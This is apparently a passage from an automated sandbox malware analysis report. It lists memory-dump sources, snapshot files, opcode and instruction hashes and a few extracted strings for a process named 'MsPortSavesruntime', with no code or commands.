                                                                                                                    • Instruction Fuzzy Hash: 45016D13B0B66E07D719B76DEC764E47390EF5313B74C03B7D099C9193DC15A48A8680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 63f2cd87a19940bead77b044e16d92c718e9f0a0d933ccb996656abe0fa0def7
                                                                                                                    • Instruction ID: 5425bd2342f8a19cf1bde18fc34b59f0a41ddc710a4f8d6a478a96cd64a4f2fd
                                                                                                                    • Opcode Fuzzy Hash: 63f2cd87a19940bead77b044e16d92c718e9f0a0d933ccb996656abe0fa0def7
                                                                                                                    • Instruction Fuzzy Hash: AE11C235B0E78C8FE722DBA888612DC7FB1EF82315F0645F7C088DB1A2D57416498794
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2330b8636cabd1bbba2006da51e9c3ccd7389726c0397c04b20c7ad9d7bad70
                                                                                                                    • Instruction ID: 821c3f479d0333476ec853466de6d7ed1f74ccc3691e0c39d768fa711028d2ff
                                                                                                                    • Opcode Fuzzy Hash: b2330b8636cabd1bbba2006da51e9c3ccd7389726c0397c04b20c7ad9d7bad70
                                                                                                                    • Instruction Fuzzy Hash: 73012636B0A5060BD328A75CE8A68E07350EF5623F70903F3F0598E1B3EE199895C240
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5b29dcd7a17228f681ea722c2aa61fa5020dc57049470d5589124beda485b340
                                                                                                                    • Instruction ID: cd80cdffea41a45f230b9082060af1de332dbaa1430313248478a5bbb025f564
                                                                                                                    • Opcode Fuzzy Hash: 5b29dcd7a17228f681ea722c2aa61fa5020dc57049470d5589124beda485b340
                                                                                                                    • Instruction Fuzzy Hash: CD01DB31E4F6C84FDB559B7488A94D87FA1EF56210B4981FBD049CB1B3DD295D46C300
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: df1d69afe1c2207046c777dcbb2e859ac17933001a6634bb7b4911c78c5fafd1
                                                                                                                    • Instruction ID: 43658cab1aa5780ce813251ce21207e0092ee33fb88a875723f75095d36bc565
                                                                                                                    • Opcode Fuzzy Hash: df1d69afe1c2207046c777dcbb2e859ac17933001a6634bb7b4911c78c5fafd1
                                                                                                                    • Instruction Fuzzy Hash: 4301B532F0561E8BEB64D798C0557FDB3A1EF98714F464235E408D3194DA7C6E458BC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4fdabf60c609c8c4ff3b61915eea2fade738a4859b23f4c9afce176aaeb5104
                                                                                                                    • Instruction ID: c508fc9ce9a7b61c3cbbd790999bbad639dda0ec1d91a375fb36da273890f961
                                                                                                                    • Opcode Fuzzy Hash: b4fdabf60c609c8c4ff3b61915eea2fade738a4859b23f4c9afce176aaeb5104
                                                                                                                    • Instruction Fuzzy Hash: A701AD35A0E78C8FE722DBA888642DDBFB1AF42314F0645E7C084DB1A2D97456488794
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3d33519c8249d7e5d1cdc21131ee2d65396c997bdbbaf8642a0c931e5022959
                                                                                                                    • Instruction ID: 9e3f3bf159f469e81d4661f13d33a290c295591d38eb117c46476488e2d6ae43
                                                                                                                    • Opcode Fuzzy Hash: e3d33519c8249d7e5d1cdc21131ee2d65396c997bdbbaf8642a0c931e5022959
                                                                                                                    • Instruction Fuzzy Hash: EB014F35A199198FCB59EB08C8A4AE9B3F1FB68300F15416DD04AE32A1DA34AA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: a12660d053721b1531771840e89e9aabade80d1e136a6a126e72922a7545e160
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: 41F03131A4D50E4AEB74EB94D4546F833A2FB94710F26417DE40ED32B6DDB86A818A14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 00c0e08206afc7866f57bb5ac8924bb3d9ecdd219bfddbdf5cf86e29886e76ea
                                                                                                                    • Instruction ID: 9f2b28c7994fe3d845938ed9ab705898f23b1ff2e3ff436ed9b14c37307b2170
                                                                                                                    • Opcode Fuzzy Hash: 00c0e08206afc7866f57bb5ac8924bb3d9ecdd219bfddbdf5cf86e29886e76ea
                                                                                                                    • Instruction Fuzzy Hash: 71F0AB3520DA49CFD781E73DDCA54D43B50EF8320875B15FBC088C7462C210185EC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6b9c25bc3156df739e1d238c0d700a571b7a7b2716e6448513313c38b5aff7f6
                                                                                                                    • Instruction ID: 17bed7793eb8d575539aa79a0b67965d007c0e52b022646ec77afbc318665535
                                                                                                                    • Opcode Fuzzy Hash: 6b9c25bc3156df739e1d238c0d700a571b7a7b2716e6448513313c38b5aff7f6
                                                                                                                    • Instruction Fuzzy Hash: FD01A230A0E38C9FE722DBA488942DDBFF1AF06314F1545E7C484CB1A2D9785648C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 34a949e4e962d579b6237736cc27c6069c3fbb46b31f53195b6c0f83db339399
                                                                                                                    • Instruction ID: 42570ae10a5ad6d09b4c01d433a080a1235fa43ebb8dccd4692ee9a370f93670
                                                                                                                    • Opcode Fuzzy Hash: 34a949e4e962d579b6237736cc27c6069c3fbb46b31f53195b6c0f83db339399
                                                                                                                    • Instruction Fuzzy Hash: E3E01A06F5F91F02E57533E968620FC72124FC8E28F9A0173E40C840E6ACCE2699027A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b55f8ec50a59e6ff77b4a1d780cb1f03f2a746061eb6fcbb3d8c6383e6744b2d
                                                                                                                    • Instruction ID: 0cd7b5dfe966c7eabe9411d9628e5a2852f754585e2ffbe0515b867d671e3816
                                                                                                                    • Opcode Fuzzy Hash: b55f8ec50a59e6ff77b4a1d780cb1f03f2a746061eb6fcbb3d8c6383e6744b2d
                                                                                                                    • Instruction Fuzzy Hash: 4EF08231E0450E8BEB18EB80D864ABD77B1FF50354F01423ED425EB2E9DEB869018B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c7955315fde2e377ea626f1b420a39aa3cbc70bb68b66a611a3c426b1d02f2e
                                                                                                                    • Instruction ID: 023ea909ed8aed74b391767ab2eaf0dfc3357bfca787faba9eec91cb37e8ba59
                                                                                                                    • Opcode Fuzzy Hash: 9c7955315fde2e377ea626f1b420a39aa3cbc70bb68b66a611a3c426b1d02f2e
                                                                                                                    • Instruction Fuzzy Hash: F6E04F2165AB844FC70A96388CA59503FB0EA6B21178B00D7D045CB1B3E519DC49C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 28505fb1def6c7f49abba11a7e7603b03e611b0f365886fbc13876b7fc566b7c
                                                                                                                    • Instruction ID: 3538e956511d493cf9efaf9275c81943321165f528a0de381eff4c03b9037014
                                                                                                                    • Opcode Fuzzy Hash: 28505fb1def6c7f49abba11a7e7603b03e611b0f365886fbc13876b7fc566b7c
                                                                                                                    • Instruction Fuzzy Hash: 68D05E30B6190D4B8B0CB62E8859430B3D1F7AA2067D45279940BC3291ED65ECC68B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 407f99ad7ac023a7d5090b7cdb25a3e1ba4ec43be87d1135fd09ee978b76a266
                                                                                                                    • Instruction ID: 1ab8588238fb9e5e7b8ed3b12020a82c82c707ce9d2bcbadf7d89d6ed0d06b34
                                                                                                                    • Opcode Fuzzy Hash: 407f99ad7ac023a7d5090b7cdb25a3e1ba4ec43be87d1135fd09ee978b76a266
                                                                                                                    • Instruction Fuzzy Hash: F3E0483170DC5B86F771979488605BE3253EFD0311F154735C019C31E5DDACA7054A80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b5674429c8f2972edd70c3e689fc155e906d2b835fa7db22aab4ec655d954e08
                                                                                                                    • Instruction ID: 743d8fea7aa622293c952210a525e51f6f2b009f2b43ad10280a6e680a72bc12
                                                                                                                    • Opcode Fuzzy Hash: b5674429c8f2972edd70c3e689fc155e906d2b835fa7db22aab4ec655d954e08
                                                                                                                    • Instruction Fuzzy Hash: 3AE04F2154F7C04FC70B973588A88843F70DE2721034A40EBC145CF2B3E5298949C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e0a0c5b6a80d60ede222f6038a7529593a02fb2e1b60b3b4749e03ba4a1b348
                                                                                                                    • Instruction ID: 226151bc8b989c72dff67a4d0be557698c926dfc11ebc5c4170e9f581c0663f1
                                                                                                                    • Opcode Fuzzy Hash: 8e0a0c5b6a80d60ede222f6038a7529593a02fb2e1b60b3b4749e03ba4a1b348
                                                                                                                    • Instruction Fuzzy Hash: ECE04F2294F7C04FC74B973488799447F60DE5721078A41EFC085CF1B3D9198849C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: 91b333ee9cbf0538e92580f02be0180df69d7a2b2146338db5774276f6cdb2fe
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: 1BE09270F0B51E4EF370A7E0C465BB9A2529F51700F0905B9D50E971E2CEFD6D808B99
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fb3efcf4e2c824c2e53e4771428e456c43f1557ca1d097a1e0362776a8ad338
                                                                                                                    • Instruction ID: 71021afe3ae8260bda527f4cba6b8b86d40f1cff3f205570927c6ad8ee39f03f
                                                                                                                    • Opcode Fuzzy Hash: 0fb3efcf4e2c824c2e53e4771428e456c43f1557ca1d097a1e0362776a8ad338
                                                                                                                    • Instruction Fuzzy Hash: B4D02230B908040FC70CA73888598307390EBAA20278101A9E00AC72B1EA6ADC88C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                                                                                    • Instruction ID: f8485f0fbd25d40b62a5e25a45161fead003a9198556e538169af8d8a7a84db2
                                                                                                                    • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                                                                                    • Instruction Fuzzy Hash: 4DD01234B519044FC71CA7388C598747391EBAA3167D541A9E00AC72B5D96ADD89C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 68381363574eaf18cd81102a9ee77ef55bcf49bd13979f4a767ad885cbd449d1
                                                                                                                    • Instruction ID: 961c03c23cc2561cd9c5d4476b0b0c6b3f03ceffd3a10ad1ff2631a9c0d38a13
                                                                                                                    • Opcode Fuzzy Hash: 68381363574eaf18cd81102a9ee77ef55bcf49bd13979f4a767ad885cbd449d1
                                                                                                                    • Instruction Fuzzy Hash: 7ED05E20F2D96F4BFAB5EBC888A07792291BF04300F130035E41DC31B6CD68EA018A11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f5c0b7f5e19a7332b469a6744e9760a454979e3109207bac79d66372fb6af10b
                                                                                                                    • Instruction ID: 4f7d6fa6d7189f62d17fe64243f0672fdc5fb0bc3f18eedf3f8abd79b4efc09a
                                                                                                                    • Opcode Fuzzy Hash: f5c0b7f5e19a7332b469a6744e9760a454979e3109207bac79d66372fb6af10b
                                                                                                                    • Instruction Fuzzy Hash: 79D0A701F1D45A67E37AE36408208BE08870F96728F0C0274F00EC57E9FD9C1A0192D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: 12b16fb0246489e09d5ac59bfe7fcc77ba7913cce52d9bc2d3eb4cd24a039fcd
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 02C08C3052180C8FC904EB3CC88480072A0FB0D214BC20090E00DC7170E29A9C80C700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: f7ff130153089bd14e3d54486f0efc9490ea2964f6fd7095d34157b66e9fc64a
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: C1C08C3051180C8FC948EB28C88480833E0FB09300FC20090E008C7170D259DCC1C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: 29bcede053835b54982e0341eb7b1837f0e0d3648e05e91d3717b3f6371a1fbb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: D0B01200D5740F00E43433FA089207970425B44200FC20070D40D80091D8CD32D80367
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5\_H
                                                                                                                    • API String ID: 0-3325266018
                                                                                                                    • Opcode ID: e280a4ccbd915f22bd4c48f973e94df486e9b29a4b66ac458929537e6e47585a
                                                                                                                    • Instruction ID: d9f00e5eb27d35808b17b247014b59133a66da393a04c4426287104ea028b2ea
                                                                                                                    • Opcode Fuzzy Hash: e280a4ccbd915f22bd4c48f973e94df486e9b29a4b66ac458929537e6e47585a
                                                                                                                    • Instruction Fuzzy Hash: 7A91F372A1DA8D8FE79ACF6888657A87FE1EF5A310F0501BED04DD72E6CAB815108740
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 692fec5cf8fe994caff61161acbd79f02eceeb45484e8a27b889da69a2ab0930
                                                                                                                    • Instruction ID: 36d4626213acafb45014cd13eafd31cbe7b8760e5052a3e2ea4928efd5f0a7fa
                                                                                                                    • Opcode Fuzzy Hash: 692fec5cf8fe994caff61161acbd79f02eceeb45484e8a27b889da69a2ab0930
                                                                                                                    • Instruction Fuzzy Hash: 6A01443771D55A8FE601E6BEF8508EA3B48DBCA23575606B7E044C71A2C140184E83E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
